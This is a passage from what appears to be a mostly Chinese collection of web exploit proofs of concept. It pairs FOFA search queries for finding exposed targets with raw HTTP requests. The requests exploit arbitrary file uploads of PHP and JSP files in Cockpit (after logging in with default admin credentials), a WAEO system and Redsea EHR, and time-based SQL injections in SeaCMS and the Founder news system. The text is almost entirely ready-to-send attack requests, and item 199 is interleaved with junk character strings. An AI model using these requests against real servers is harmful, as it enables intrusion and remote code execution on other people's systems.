Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

0 O; U) O1 d8 O3 \1 l# l, u199. cockpit系统assetsmanager_upload接口 文件上传$ S: G# e* A, R% j( k# ?6 P0 `
" x. S- f- X( K
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
$ c- w2 t3 x! v/ c/ VGET /auth/login?to=/ HTTP/1.1
+ W2 C; l, v# G' ^1 e. k/ H V7 H# P$ V. n; n' |. |
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
) o4 N7 V: g- L7 V+ Y! G" @ ~; J3 D* l
2.使用刚才上一步获取到的jwt获取cookie:; f3 t2 u, x+ y# T4 @- H1 c
) q) Y% E# G' _POST /auth/check HTTP/1.1
" ^% Z: |) Y0 X. E9 ?3 }% Q. [! {. }Content-Type: application/json
8 K" c, P5 [' e/ I0 c) a' B8 O# d) v" o0 D& `) n: b+ i2 g/ G
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
# R* A9 R, f1 w O- K/ b
( ? _; u4 N% Z. e! [0 ~响应:200,返回值:
$ F3 X1 C# c) }7 oSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/5 O( |1 O* ^2 i
Fofa:title="Authenticate Please!"* N" p6 Z) K7 J/ U
POST /assetsmanager/upload HTTP/1.1
# m0 t& I8 \4 {6 HContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb34 W6 v1 j, a% K/ F2 G- T, M$ _
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
+ _5 m" M, m4 T/ B% Y, h+ y- |; J/ \6 o+ q9 k
-----------------------------36D28FBc36bd6feE7Fb3' w6 w8 A- M" o; V
Content-Disposition: form-data; name="files[]"; filename="tttt.php"% F% i( Y; U1 E
Content-Type: text/php: _' v% Y/ _4 K7 a$ J; @3 V1 u
" U, J7 {0 e9 {( [
<?php echo "tttt";unlink(__FILE__);?>: F0 [" V8 O" }/ Q& P, d- v7 s- F
-----------------------------36D28FBc36bd6feE7Fb3
7 J( l) ]5 I4 f- j3 HContent-Disposition: form-data; name="folder"" C: o9 x9 Z0 {$ V1 Q
) `1 [& n6 g$ ^! W6 ]) |( n3 R
-----------------------------36D28FBc36bd6feE7Fb3--
$ {9 i0 |% I9 L% [& ^# S. o# G4 b7 G8 B) [; ?3 z& o. z. X# n
; L3 E+ H& {( d# Q& L8 [
/storage/uploads/tttt.php6 E9 `3 t) L4 q! N3 t
200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION placeholders below with the values obtained:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--